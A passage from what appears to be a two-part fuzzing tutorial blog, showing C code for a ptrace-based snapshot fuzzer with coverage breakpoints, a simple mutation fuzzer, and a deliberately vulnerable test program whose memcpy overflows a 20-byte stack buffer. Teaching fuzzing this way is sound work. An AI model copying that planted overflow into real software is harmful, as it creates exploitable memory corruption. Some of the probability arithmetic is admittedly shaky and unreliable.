    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("personality");
    exit(errno);
}
 
// dup both stdout and stderr and send them to /dev/null
int fd = open("/dev/null", O_WRONLY);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
 
// exec our debugee program, NULL terminated to avoid Sentinel compilation
// warning. this replaces the fork() clone of the parent with the 
// debugee process 
int execl_result = execl(debugee, debugee, NULL);
if (execl_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("execl");
    exit(errno);
}

So first thing’s first, we need a way to grab the one-byte value at an address before we insert our breakpoint. For the fuzzer, I developed a header file and source file I called ptrace_helpers to help ease the development process of using ptrace(). To grab the value, we’ll grab the 64-bit value at the address but only care about the byte all the way to the right. (I’m using the type long long unsigned because that’s how register values are defined in <sys/user.h> and I wanted to keep everything the same).

long long unsigned get_value(pid_t child_pid, long long unsigned address) {
    
    errno = 0;
    long long unsigned value = ptrace(PTRACE_PEEKTEXT, child_pid, (void*)address, 0);
    if (value == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return value;	
}

So this function will use the PTRACE_PEEKTEXT argument to read the value located at address in the child process (child_pid) which is our target. So now that we have this value, we can save it off and insert our breakpoint with the following code:

void set_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    long long unsigned breakpoint = (original_value & 0xFFFFFFFFFFFFFF00 | 0xCC);
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)breakpoint);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

You can see that this function will take our original value that we gathered with the previous function and performs two bitwise operations to keep the first 7 bytes intact but then replace the last byte with \xCC. Notice that we are now using PTRACE_POKETEXT. One of the frustrating features of the ptrace() interface is that we can only read and write 8 bytes at a time!

So now that we can set breakpoints, the last function we need to implement is one to remove breakpoints, which would entail overwriting the int3 with the original byte value.

void revert_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)original_value);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

Again, using PTRACE_POKETEXT, we can overwrite the \xCC with the original byte value. So now we have the ability to set and remove breakpoints.

Lastly, we’ll need a way to resume execution in the debuggee. This can be accomplished by utilizing the PTRACE_CONT argument in ptrace() as follows:

void resume_execution(pid_t child_pid) {

    int ptrace_result = ptrace(PTRACE_CONT, child_pid, 0, 0);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

An important thing to note is, if we hit a breakpoint at address 0x000000000000000, rip will actually be at 0x0000000000000001. So after reverting our overwritten instruction to its previous value, we’ll also need to subtract 1 from rip before resuming execution, we’ll learn how to do this via ptrace in the next section.

Let’s now learn how we can utilize ptrace and the /proc pseudo files to create a snapshot of our target!

Snapshotting with ptrace and /proc

Register States

Another cool feature of ptrace() is the ability to capture and set register states in a debuggee process. We can do both of those things respectively with the helper functions I placed in ptrace_helpers.c:

// retrieve register states
struct user_regs_struct get_regs(pid_t child_pid, struct user_regs_struct registers) {                                                                                                 
    int ptrace_result = ptrace(PTRACE_GETREGS, child_pid, 0, &registers);                                                                              
    if (ptrace_result == -1) {                                                                              
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);                                                                         
        perror("ptrace");                                                                              
        exit(errno);                                                                              
    }

    return registers;                                                                              
}

// set register states
void set_regs(pid_t child_pid, struct user_regs_struct registers) {

    int ptrace_result = ptrace(PTRACE_SETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

The struct user_regs_struct is defined in <sys/user.h>. You can see we use PTRACE_GETREGS and PTRACE_SETREGS respectively to retrieve register data and set register data. So with these two functions, we’ll be able to create a struct user_regs_struct of snapshot register values when we are sitting at our ‘start’ breakpoint and when we reach our ‘end’ breakpoint, we’ll be able to revert the register states (most imporantly rip) to what they were when snapshotted.

Snapshotting Writable Memory Sections with /proc

Now that we have a way to capture register states, we’ll need a way to capture writable memory states for our snapshot. I did this by interacting with the /proc pseudo files. I used GDB to break on the first function that peforms a check in vuln, importantly this function is after vuln reads the jpeg off disk and will serve as our ‘start’ breakpoint. Once we break here in GDB, we can cat the /proc/$pid/maps file to get a look at how memory is mapped in the process (keep in mind GDB also forces ASLR off using the same method we did in our debugger). We can see the output here grepping for writable sections (ie, sections that could be clobbered during our fuzzcase run):

h0mbre@pwn:~/fuzzing/dragonfly_dir$ cat /proc/12011/maps | grep rw
555555756000-555555757000 rw-p 00002000 08:01 786686                     /home/h0mbre/fuzzing/dragonfly_dir/vuln
555555757000-555555778000 rw-p 00000000 00:00 0                          [heap]
7ffff7dcf000-7ffff7dd1000 rw-p 001eb000 08:01 1055012                    /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd1000-7ffff7dd5000 rw-p 00000000 00:00 0 
7ffff7fe0000-7ffff7fe2000 rw-p 00000000 00:00 0 
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 1054984                    /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]

So that’s seven distinct sections of memory. You’ll notice that the heap is one of the sections. It is important to realize that our fuzzcase will be inserted into the heap, but the address in the heap that stores the fuzzcase will not be the same in our fuzzer as it is in GDB. This is likely due to some sort of environment variable difference between the two debuggers I think. If we look in GDB when we break on check_one() in vuln, we see that rax is a pointer to the beginning of our input, in this case the Canon_40D.jpg.

$rax   : 0x00005555557588b0  →  0x464a1000e0ffd8ff

That pointer, 0x00005555557588b0, is located in the heap. So all I had to do to find out where that pointer was in our debugger/fuzzer, was just break at the same point and use ptrace() to retrieve the rax value.

I would break on check_one and then open /proc/$pid/maps to get the offsets within the program that contain writable memory sections, and then I would open /proc/$pid/mem and read from those offsets into a buffer to store the writable memory. This code was stored in a source file called snapshot.c which contained some definitions and functions to both capture snapshots and restore them. For this part, capturing writable memory, I used the following definitions and function:

unsigned char* create_snapshot(pid_t child_pid) {
 
    struct SNAPSHOT_MEMORY read_memory = {
        {
            // maps_offset
            0x555555756000,
            0x7ffff7dcf000,
            0x7ffff7dd1000,
            0x7ffff7fe0000,
            0x7ffff7ffd000,
            0x7ffff7ffe000,
            0x7ffffffde000
        },
        {
            // snapshot_buf_offset
            0x0,
            0xFFF,
            0x2FFF,
            0x6FFF,
            0x8FFF,
            0x9FFF,
            0xAFFF
        },
        {
            // rdwr length
            0x1000,
            0x2000,
            0x4000,
            0x2000,
            0x1000,
            0x1000,
            0x21000
        }
    };  
 
    unsigned char* snapshot_buf = (unsigned char*)malloc(0x2C000);
 
    // this is just /proc/$pid/mem
    char proc_mem[0x20] = { 0 };
    sprintf(proc_mem, "/proc/%d/mem", child_pid);
 
    // open /proc/$pid/mem for reading
    // hardcoded offsets are from typical /proc/$pid/maps at main()
    int mem_fd = open(proc_mem, O_RDONLY);
    if (mem_fd == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("open");
        exit(errno);
    }
 
    // this loop will:
    //  -- go to an offset within /proc/$pid/mem via lseek()
    //  -- read x-pages of memory from that offset into the snapshot buffer
    //  -- adjust the snapshot buffer offset so nothing is overwritten in it
    int lseek_result, bytes_read;
    for (int i = 0; i < 7; i++) {
        //printf("dragonfly> Reading from offset: %d\n", i+1);
        lseek_result = lseek(mem_fd, read_memory.maps_offset[i], SEEK_SET);
        if (lseek_result == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("lseek");
            exit(errno);
        }
 
        bytes_read = read(mem_fd,
            (unsigned char*)(snapshot_buf + read_memory.snapshot_buf_offset[i]),
            read_memory.rdwr_length[i]);
        if (bytes_read == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("read");
            exit(errno);
        }
    }
 
    close(mem_fd);
    return snapshot_buf;
}

You can see that I hardcoded all the offsets and the lengths of the sections. Keep in mind, this doesn’t need to be fast. We’re only capturing a snapshot once, so it’s ok to interact with the file system. So we’ll loop through these 7 offsets and lengths and write them all into a buffer called snapshot_buf which will be stored in our fuzzer’s heap. So now we have both the register states and the memory states of our process as it begins check_one (our ‘start’ breakpoint).

Let’s now figure out how to restore the snapshot when we reach our ‘end’ breakpoint.

Restoring Snapshot

To restore the process memory state, we could just write to /proc/$pid/mem the same way we read from it; however, this portion needs to be fast since we are doing this every fuzzing iteration now. Iteracting with the file system every fuzzing iteration will slow us down big time. Luckily, since Linux kernel version 3.2, there is support for a much faster, process-to-process, memory reading/writing API that we can leverage called process_vm_writev(). Since this process works directly with another process and doesn’t traverse the kernel and doesn’t involve the file system, it will greatly increase our write speeds.

It’s kind of confusing looking at first but the man page example is really all you need to understand how it works, I’ve opted to just hardcode all of the offsets since this fuzzer is simply a POC. and we can restore the writable memory as follows:

void restore_snapshot(unsigned char* snapshot_buf, pid_t child_pid) {
 
    ssize_t bytes_written = 0;
    // we're writing *from* 7 different offsets within snapshot_buf
    struct iovec local[7];
    // we're writing *to* 7 separate sections of writable memory here
    struct iovec remote[7];
 
    // this struct is the local buffer we want to write from into the 
    // struct that is 'remote' (ie, the child process where we'll overwrite
    // all of the non-heap writable memory sections that we parsed from 
    // proc/$pid/memory)
    local[0].iov_base = snapshot_buf;
    local[0].iov_len = 0x1000;
    local[1].iov_base = (unsigned char*)(snapshot_buf + 0xFFF);
    local[1].iov_len = 0x2000;
    local[2].iov_base = (unsigned char*)(snapshot_buf + 0x2FFF);
    local[2].iov_len = 0x4000;
    local[3].iov_base = (unsigned char*)(snapshot_buf + 0x6FFF);
    local[3].iov_len = 0x2000;
    local[4].iov_base = (unsigned char*)(snapshot_buf + 0x8FFF);
    local[4].iov_len = 0x1000;
    local[5].iov_base = (unsigned char*)(snapshot_buf + 0x9FFF);
    local[5].iov_len = 0x1000;
    local[6].iov_base = (unsigned char*)(snapshot_buf + 0xAFFF);
    local[6].iov_len = 0x21000;
 
    // just hardcoding the base addresses that are writable memory
    // that we gleaned from /proc/pid/maps and their lengths
    remote[0].iov_base = (void*)0x555555756000;
    remote[0].iov_len = 0x1000;
    remote[1].iov_base = (void*)0x7ffff7dcf000;
    remote[1].iov_len = 0x2000;
    remote[2].iov_base = (void*)0x7ffff7dd1000;
    remote[2].iov_len = 0x4000;
    remote[3].iov_base = (void*)0x7ffff7fe0000;
    remote[3].iov_len = 0x2000;
    remote[4].iov_base = (void*)0x7ffff7ffd000;
    remote[4].iov_len = 0x1000;
    remote[5].iov_base = (void*)0x7ffff7ffe000;
    remote[5].iov_len = 0x1000;
    remote[6].iov_base = (void*)0x7ffffffde000;
    remote[6].iov_len = 0x21000;
 
    bytes_written = process_vm_writev(child_pid, local, 7, remote, 7, 0);
    //printf("dragonfly> %ld bytes written\n", bytes_written);
}

So for 7 different writable sections, we’ll write into the debuggee process at the offsets defined in /proc/$pid/maps from our snapshot_buf that has the pristine snapshot data. AND IT WILL BE FAST!

So now that we have the ability to restore the writable memory, we’ll only need to restore the register states now and we’ll be able to complete our rudimentary snapshot mechanism. That is easy using our ptrace_helpers defined functions and you can see the two function calls within the fuzzing loop as follows:

// restore writable memory from /proc/$pid/maps to its state at Start
restore_snapshot(snapshot_buf, child_pid);

// restore registers to their state at Start
set_regs(child_pid, snapshot_registers);

So that’s how our snapshot process works and in my testing, we achieved about a 20-30x speed-up over the dumb fuzzer!

Making our Dumb Fuzzer Smart

At this point, we still have a dumb fuzzer (albeit much faster now). We need to be able to track code coverage. A very simple way to do this would be to place a breakpoint at every ‘basic block’ between check_one and exit so that if we reach new code, a breakpoint will be reached and we can do_something() there.

This is exactly what I did except for simplicity sake, I just placed ‘dynamic’ (code coverage) breakpoints at the entry points to check_two and check_three. When a ‘dynamic’ breakpoint is reached, we save the input that reached the code into an array of char pointers called the ‘corpus’ and we can now start mutating those saved inputs instead of just our ‘prototype’ input of Canon_40D.jpg.

So our code coverage feedback mechanism will work like this:

Mutate prototype input and insert the fuzzcase into the heap
Resume debuggee
If ‘dynamic breakpoint’ reached, save input into corpus
If corpus > 0, randomly pick an input from the corpus or the prototype and repeat from step 1

We also have to remove the dynamic breakpoint so that we stop breaking on it. Good thing we already know how to do this well!

As you may remember from the last post, code coverage is crucial to our ability to crash this test binary vuln as it performs 3 byte comparisons that all must pass before it crashes. We determined mathematically last post that our chances of passing the first check is about 1 in 13 thousand and our chances of passing the first two checks is about 1 in 170 million. Because we’re saving input off that passes check_one and mutating it further, we can reduce the probability of passing check_two down to something close to the 1 in 13 thousand figure. This also applies to inputs that then pass check_two and we can therefore reach and pass check_three with ease.

Running The Fuzzer

The first stage of our fuzzer, which collects snapshot data and sets ‘dynamic breakpoints’ for code coverage, completes very quickly even though its not meant to be fast. This is because all the values are hardcoded since our target is extremely simple. In a complex multi-threaded target we would need some way to script the discovery of dynamic breakpoint addresses via Ghidra or objdump or something and we’d need to have that script write a configuration file for our fuzzer, but that’s far off. For now, for a POC, this works fine.

h0mbre@pwn:~/fuzzing/dragonfly_dir$ ./dragonfly 

dragonfly> debuggee pid: 12156
dragonfly> setting 'start/end' breakpoints:

   start-> 0x555555554b41
   end  -> 0x5555555548c0

dragonfly> set dynamic breakpoints: 

           0x555555554b7d
           0x555555554bb9

dragonfly> collecting snapshot data
dragonfly> snapshot collection complete
dragonfly> press any key to start fuzzing!

You can see that the fuzzer helpfully displays the ‘start’ and ‘end’ breakpoints as well as lists the ‘dynamic breakpoints’ for us so that we can check to see that they are correct before fuzzing. The fuzzer pauses and waits for us to press any key to start fuzzing. We can also see that the snapshot data collection has completed successfully so now we are broken on ‘start’ and have all the data we need to start fuzzing.

Once we press enter, we get a statistics output that shows us how the fuzzing is going:

dragonfly> stats (target:vuln, pid:12156)

fc/s       : 41720
crashes    : 5
iterations : 0.3m
coverage   : 2/2 (%100.00)

As you can see, it found both ‘dynamic breakpoints’ almost instantly and is currently running about 41k fuzzing iterations per second of CPU time (about 20-30x faster in wall time than our dumb fuzzer).

Most importantly, you can see that we were able to crash the binary 5 times already in just 300k iterations! We could’ve never done this with our previous fuzzer.

vv CLICK THIS TO WATCH IT IN ACTION vv

Conclusion

One of the biggest takeaways for me from doing this was just how much more performance you can squeeze out of a fuzzer if you just customize it for your target. Using out of the box frameworks like AFL is great and they are incredibly impressive tools, I hope this fuzzer will one day grow into something comparable. We were able to run about 20-30x faster than AFL for this really simple target and were able to crash it almost instantly with just a little bit of reverse engineering and customization. I thought this was really neat and instructive. In the future, when I adapt this fuzzer for a real target, I should be able to outperform frameworks again.

Ideas for Improvment

Where to begin? We have a lot of areas where we can improve but some immediate improvements that can be made are:

optimize performance by refactoring code, changing location of global variables
enabling the dynamic configuration of the fuzzer via a config file that can be created via a Python script
implementing more mutation methods
implementing more code coverage mechanisms
developing the fuzzer so that many instances can run in parallel and share discovered inputs/coverage data

Perhaps we will see these improvements in a subsequent post and the results of fuzzing a real target with the same general approach. Until then!

Code

All of the code for this blogpost can be found here: https://github.com/h0mbre/Fuzzing/tree/master/Caveman4

Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage

The Human Machine Interface

h0mbre

26 May 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’, we’ll be continuing on our by noob for noobs fuzzing journey and trying to wrap our little baby fuzzing brains around the concept of code coverage and why its so important. As far as I know, code coverage is, at a high-level, the attempt made by fuzzers to track/increase how much of the target application’s code is reached by the fuzzer’s inputs. The idea being that the more code your fuzzer inputs reach, the greater the attack surface, the more comprehensive your testing is, and other big brain stuff that I don’t understand yet.

I’ve been working on my pwn skills, but taking short breaks for sanity to write some C and watch some @gamozolabs streams. @gamozolabs broke down the importance of code coverage during one of these streams, and I cannot for the life of me track down the clip, but I remembered it vaguely enough to set up some test cases just for my own testing to demonstrate why “dumb” fuzzers are so disadvantaged compared to code-coverage-guided fuzzers. Get ready for some (probably incorrect 🤣) 8th grade probability theory. By the end of this blog post, we should be able to at least understand, broadly, how state of the art fuzzers worked in 1990.

Our Fuzzer

We have this beautiful, error free, perfectly written, single-threaded jpeg mutation fuzzer that we’ve ported to C from our previous blog posts and tweaked a bit for the purposes of our experiments here.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h> 
#include <fcntl.h>

int crashes = 0;

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_data(char* fuzz_target) {

    FILE *fileptr;
    char *clone_data;
    long filelen;

    // open file in binary read mode
    // jump to end of file, get length
    // reset pointer to beginning of file
    fileptr = fopen(fuzz_target, "rb");
    if (fileptr == NULL) {
        printf("[!] Unable to open fuzz target, exiting...\n");
        exit(1);
    }
    fseek(fileptr, 0, SEEK_END);
    filelen = ftell(fileptr);
    rewind(fileptr);

    // cast malloc as char ptr
    // ptr offset * sizeof char = data in .jpeg
    clone_data = (char *)malloc(filelen * sizeof(char));

    // get length for struct returned
    size_t length = filelen * sizeof(char);

    // read in the data
    fread(clone_data, filelen, 1, fileptr);
    fclose(fileptr);

    struct ORIGINAL_FILE original_file;
    original_file.data = clone_data;
    original_file.length = length;

    return original_file;
}

void create_new(struct ORIGINAL_FILE original_file, size_t mutations) {

    //
    //----------------MUTATE THE BITS-------------------------
    //
    int* picked_indexes = (int*)malloc(sizeof(int)*mutations);
    for (int i = 0; i < (int)mutations; i++) {
        picked_indexes[i] = rand() % original_file.length;
    }

    char * mutated_data = (char*)malloc(original_file.length);
    memcpy(mutated_data, original_file.data, original_file.length);

    for (int i = 0; i < (int)mutations; i++) {
        char current = mutated_data[picked_indexes[i]];

        // figure out what bit to flip in this 'decimal' byte
        int rand_byte = rand() % 256;
        
        mutated_data[picked_indexes[i]] = (char)rand_byte;
    }

    //
    //---------WRITING THE MUTATED BITS TO NEW FILE-----------
    //
    FILE *fileptr;
    fileptr = fopen("mutated.jpeg", "wb");
    if (fileptr == NULL) {
        printf("[!] Unable to open mutated.jpeg, exiting...\n");
        exit(1);
    }
    // buffer to be written from,
    // size in bytes of elements,
    // how many elements,
    // where to stream the output to :)
    fwrite(mutated_data, 1, original_file.length, fileptr);
    fclose(fileptr);
    free(mutated_data);
    free(picked_indexes);
}

void exif(int iteration) {
    
    //fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");
    char* file = "vuln";
    char* argv[3];
    argv[0] = "vuln";
    argv[1] = "mutated.jpeg";
    argv[2] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);
        

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

int main(int argc, char** argv) {

    if (argc < 3) {
        printf("Usage: ./cfuzz <valid jpeg> <num of fuzz iterations>\n");
        printf("Usage: ./cfuzz Canon_40D.jpg 10000\n");
        exit(1);
    }

    // get our random seed
    srand((unsigned)time(NULL));

    char* fuzz_target = argv[1];
    struct ORIGINAL_FILE original_file = get_data(fuzz_target);
    printf("[>] Size of file: %ld bytes.\n", original_file.length);
    size_t mutations = (original_file.length - 4) * .02;
    printf("[>] Flipping up to %ld bytes.\n", mutations);

    int iterations = atoi(argv[2]);
    printf("[>] Fuzzing for %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        create_new(original_file, mutations);
        exif(i);
    }
    
    printf("\n[>] Fuzzing completed, exiting...\n");
    return 0;
}

Not going to spend a lot of time on the fuzzer’s features (what features?) here, but some important things about the fuzzer code:

it takes a file as input and copies the bytes from the file into a buffer
it calculates the length of the buffer in bytes, and then mutates 2% of the bytes by randomly overwriting them with arbitrary bytes
the function responsible for the mutation, create_new, doesn’t keep track of what byte indexes were mutated so theoretically, the same index could be chosen for mutation multiple times, so really, the fuzzer mutates up to 2% of the bytes.

Small Detour, I Apologize

We only have one mutation method here to keep things super simple, in doing so, I actually learned something really useful that I hadn’t clearly thought out previously. In a previous post I wondered, embarrassingly, aloud and in print, how much different random bit flipping was from random byte overwriting (flipping?). Well, it turns out, they are super different. Let’s take a minute to see how.

Let’s say we’re mutating an array of bytes called bytes. We’re mutating index 5. bytes[5] == \x41 (65 in decimal) in the unmutated, pristine original file. If we only bit flip, we are super limited in how much we can mutate this byte. 65 is 01000001 in binary. Let’s just go through at see how much it changes from arbitrarily flipping one bit:

Flipping first bit: 11000001 = 193,
Flipping second bit: 00000001 = 1,
Flipping third bit: 01100001 = 97,
Flipping fourth bit: 01010001 = 81,
Flipping fifth bit: 01001001 = 73,
Flipping sixth bit: 01000101 = 69,
Flipping seventh bit: 01000011 = 67, and
Flipping eighth bit: 010000001 = 64.

As you can see, we’re locked in to a severely limited amount of possibilities.

So for this program, I’ve opted to replace this mutation method with one that instead just substitutes a random byte instead of a bit within the byte.

Vulnerable Program

I wrote a simple cartoonish program to demonstrate how hard it can be for “dumb” fuzzers to find bugs. Imagine a target application that has several decision trees in the disassembly map view of the binary. The application performs 2-3 checks on the input to see if it meets certain criteria before passing the input to some sort of vulnerable function. Here is what I mean:

Our program does this exact thing, it retrieves the bytes of an input file and checks the bytes at an index 1/3rd of the file length, 1/2 of the file length, and 2/3 of the file length to see if the bytes in those positions match some hardcoded values (arbitrary). If all the checks are passed, the application copies the byte buffer into a small buffer causing a segfault to simulate a vulnerable function. Here is our program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_bytes(char* fileName) {

    FILE *filePtr;
    char* buffer;
    long fileLen;

    filePtr = fopen(fileName, "rb");
    if (!filePtr) {
        printf("[>] Unable to open %s\n", fileName);
        exit(-1);
    }
    
    if (fseek(filePtr, 0, SEEK_END)) {
        printf("[>] fseek() failed, wtf?\n");
        exit(-1);
    }

    fileLen = ftell(filePtr);
    if (fileLen == -1) {
        printf("[>] ftell() failed, wtf?\n");
        exit(-1);
    }

    errno = 0;
    rewind(filePtr);
    if (errno) {
        printf("[>] rewind() failed, wtf?\n");
        exit(-1);
    }

    long trueSize = fileLen * sizeof(char);
    printf("[>] %s is %ld bytes.\n", fileName, trueSize);
    buffer = (char *)malloc(fileLen * sizeof(char));
    fread(buffer, fileLen, 1, filePtr);
    fclose(filePtr);

    struct ORIGINAL_FILE original_file;
    original_file.data = buffer;
    original_file.length = trueSize;

    return original_file;
}

void check_one(char* buffer, int check) {

    if (buffer[check] == '\x6c') {
        return;
    }
    else {
        printf("[>] Check 1 failed.\n");
        exit(-1);
    }
}

void check_two(char* buffer, int check) {

    if (buffer[check] == '\x57') {
        return;
    }
    else {
        printf("[>] Check 2 failed.\n");
        exit(-1);
    }
}

void check_three(char* buffer, int check) {

    if (buffer[check] == '\x21') {
        return;
    }
    else {
        printf("[>] Check 3 failed.\n");
        exit(-1);
    }
}

void vuln(char* buffer, size_t length) {

    printf("[>] Passed all checks!\n");
    char vulnBuff[20];

    memcpy(vulnBuff, buffer, length);

}

int main(int argc, char *argv[]) {
    
    if (argc < 2 || argc > 2) {
        printf("[>] Usage: vuln example.txt\n");
        exit(-1);
    }

    char *filename = argv[1];
    printf("[>] Analyzing file: %s.\n", filename);

    struct ORIGINAL_FILE original_file = get_bytes(filename);

    int checkNum1 = (int)(original_file.length * .33);
    printf("[>] Check 1 no.: %d\n", checkNum1);

    int checkNum2 = (int)(original_file.length * .5);
    printf("[>] Check 2 no.: %d\n", checkNum2);

    int checkNum3 = (int)(original_file.length * .67);
    printf("[>] Check 3 no.: %d\n", checkNum3);

    check_one(original_file.data, checkNum1);
    check_two(original_file.data, checkNum2);
    check_three(original_file.data, checkNum3);
    
    vuln(original_file.data, original_file.length);
    

    return 0;
}

Keep in mind that this is only one type of criteria, there are several different types of criteria that exist in binaries. I selected this one because the checks are so specific it can demonstrate, in an exaggerated way, how hard it can be to reach new code purely by randomness.

Our sample file, which we’ll mutate and feed to this vulnerable application is still the same file from the previous posts, the Canon_40D.jpg file with exif data.

h0mbre@pwn:~/fuzzing$ file Canon_40D.jpg 
Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, frames 3
h0mbre@pwn:~/fuzzing$ ls -lah Canon_40D.jpg 
-rw-r--r-- 1 h0mbre h0mbre 7.8K May 25 06:21 Canon_40D.jpg

The file is 7958 bytes long. Let’s feed it to the vulnerable program and see what indexes are chosen for the checks:

h0mbre@pwn:~/fuzzing$ vuln Canon_40D.jpg 
[>] Analyzing file: Canon_40D.jpg.
[>] Canon_40D.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Check 1 failed.

So we can see that indexes 2626, 3979, and 5331 were chosen for testing and that the file failed the first check as the byte at that position wasn’t \x6c.

Experiment 1: Passing Only One Check

Let’s take away checks two and three and see how our dumb fuzzer performs against the binary when we only have to pass one check.

I’ll comment out checks two and three:

check_one(original_file.data, checkNum1);
//check_two(original_file.data, checkNum2);
//check_three(original_file.data, checkNum3);
    
vuln(original_file.data, original_file.length);

And so now, we’ll take our unaltered jpeg, which naturally does not pass the first check, and have our fuzzer mutate it and send it to the vulnerable application hoping for crashes. Remember, that the fuzzer mutates up to 159 bytes of the 7958 bytes total each fuzzing iteration. If the fuzzer randomly inserts an \x6c into index 2626, we will pass the first check and execution will pass to the vulnerable function and cause a crash. Let’s run our dumb fuzzer 1 million times and see how many crashes we get.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_40D.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 88
[>] Fuzzing completed, exiting...

So out of 1 million iterations, we got 88 crashes. So on about %.0088 of our iterations, we met the criteria to pass check 1 and hit the vulnerable function. Let’s double check our crash to make sure there’s no error in any of our code (I fuzzed the vulnerable program with all checks enabled in QEMU mode (to simulate not having source code) with AFL for 14 hours and wasn’t able to crash the program so I hope there are no bugs that I don’t know about 😬).

h0mbre@pwn:~/fuzzing/ccrashes$ vuln 998636.11 
[>] Analyzing file: 998636.11.
[>] 998636.11 is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Passed all checks!
Segmentation fault

So feeding the vulnerable program one of the crash inputs actually does crash it. Cool.

Disclaimer: Here is where some math comes in, and I’m not guaranteeing this math is correct. I even sought help from some really smart people like @Firzen14 and am still not 100% confident in my math lol. But! I did go ahead and simulate the systems involved here hundreds of millions of times and the results of the empirical data were super close to what the possibly broken math said it should be. So, if it’s not correct, its at least close enough to prove the points I’m trying to demonstrate.

Let’s try and figure out how likely it is that we pass the first check and get a crash. The first obstacle we need to pass is that we need index 2626 to be chosen for mutation. If it’s not mutated, we know that by default its not going to hold the value we need it to hold and we won’t pass the check. Since we’re selecting a byte to be mutated 159 times, and we have 7958 bytes to choose from, the odds of us mutating the byte at index 2626 is probably something close to 159/7958 which is 0.0199798944458407.

The second obstacle, is that we need it to hold exactly \x6c and the fuzzer has 255 byte values to choose from. So the chances of this byte, once selected for mutation, to be mutated to exactly \x6c is 1/255, which is 0.003921568627451.

So the chances of both of these things occurring should be close to 0.0199798944458407 * 0.003921568627451, (about .0078%), which if you multiply by 1 million, would have you at around 78 crashes. We were pretty close to that with 88. Given that we’re doing this randomly, there is going to be some variance.

So in conclusion for Experiment 1, we were able to reliably pass this one type of check and reach our vulnerable function with our dumb fuzzer. Let’s see how things change when add a second check.

Experiment 2: Passing Two Checks

Here is where the math becomes an even bigger problem; however, as I said previously, I ran a simulation of the events hundreds of millions of times and was pretty close to what I thought should be the math.

Having the byte value be correct is fairly straightforward I think and is always going to be 1/255, but having both indexes selected for mutation with only 159 choices available tripped me up. I ran a simulator to see how often it occurred that both indexes were selected for mutation and let it run for a while, after over 390 million iterations, it happened around 155,000 times total.

<snip>
Occurences: 155070    Iterations: 397356879
Occurences: 155080    Iterations: 397395052
Occurences: 155090    Iterations: 397422769
